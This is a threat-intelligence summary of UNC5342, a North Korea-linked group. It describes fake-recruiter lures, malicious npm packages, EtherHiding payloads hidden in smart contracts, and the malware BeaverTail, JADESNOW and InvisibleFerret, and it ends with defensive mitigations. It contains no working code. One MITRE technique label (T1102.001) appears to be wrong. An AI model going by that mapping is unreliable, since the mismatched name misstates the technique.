Full Report
A threat actor with ties to the Democratic People's Republic of Korea (aka North Korea) has been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed by Google Threat Intelligence Group (GTIG) to a threat cluster it tracks as UNC5342,
Analysis Summary
# Threat Actor: UNC5342 (North Korea State-Sponsored)
## Attribution & Identity
The threat actor is associated with the **Democratic People's Republic of Korea (North Korea)**.
Known aliases include: CL-STA-0240 (Palo Alto Networks Unit 42), DeceptiveDevelopment (ESET), DEV#POPPER (Securonix), Famous Chollima (CrowdStrike), Gwisin Gang (DTEX), Tenacious Pungsan (Datadog), and Void Dokkaebi (Trend Micro).
## Activity Summary
The actor is engaged in a long-running campaign codenamed **Contagious Interview**. This campaign involves social engineering potential targets, specifically developers, via LinkedIn, posing as recruiters or hiring managers. The conversation pivots to Telegram or Discord, where targets are tricked into running malicious code under the guise of a job assessment. The primary goals are cyber espionage and financial gain, specifically stealing sensitive data and siphoning cryptocurrency assets. The group has recently adopted the **EtherHiding** technique since February 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Posing as recruiters/hiring managers on LinkedIn, transitioning to Telegram/Discord to trick victims into running malicious code for "job assessments." (Assumed MITRE T1566.001: Phishing: Spearphishing Link/Attachment, T1059 for code execution)
- **Malware Delivery via Software Supply Chain:** Initial download manifests as malicious **npm packages**.
- **Cryptocurrency Theft/Blockchain Exploitation:** Utilizing **EtherHiding** to embed malicious code within smart contracts on public blockchains (like BNB Smart Chain or Ethereum). This turns the blockchain into a decentralized, resilient dead drop resolver (related to MITRE T1102.001: Information Collection: Web Session Query).
- **Payload Execution:** Multi-stage infection chain targeting Windows, macOS, and Linux systems.
- **Payload Updating:** The attacker can update the malicious payload within the smart contract remotely.
- **Lateral Movement/Control:** Deployment of a Python backdoor for remote control and long-term data theft.
## Targeting
- Sectors: Developers (implied by the social engineering vector focusing on job assessments).
- Geography: Not explicitly stated, but attribution is North Korean state-sponsored activity.
- Victims: Developers, with specific components targeting MetaMask, Phantom wallets, and password managers (like 1Password).
## Tools & Infrastructure
- **Malware Families Used:**
* Initial downloader (via npm packages)
* BeaverTail (JavaScript stealer: exfiltrates crypto wallets, browser extension data, credentials)
* JADESNOW (JavaScript downloader that fetches InvisibleFerret)
* InvisibleFerret (Python backdoor: grants remote control, targets wallets/credentials)
- **Infrastructure:**
* **EtherHiding:** Malicious code embedded in smart contracts on public blockchains (BNB Smart Chain, Ethereum). This acts as resilient C2/payload hosting.
## Implications
This marks an escalation in nation-state threat actor methodology. UNC5342 is utilizing blockchain technology (**EtherHiding**) to create next-generation, bulletproof hosting for malware payloads, making them highly resistant to traditional law enforcement takedown efforts. The flexibility to update payloads remotely also increases the longevity and adaptability of their attacks.
## Mitigations
- Increased vigilance regarding unsolicited contact from "recruiters" on professional platforms, especially when interactions move to platforms like Telegram or Discord for job assessments.
- Implement strict controls on running code or installing dependencies (e.g., npm packages) received from untrusted sources or in suspicious contexts.
- Enhance endpoint detection capabilities across Windows, macOS, and Linux to identify the known malware stages (BeaverTail, JADESNOW, InvisibleFerret).
- Audit and monitor organizational crypto assets/wallets for unauthorized access attempts, particularly those using MetaMask or Phantom.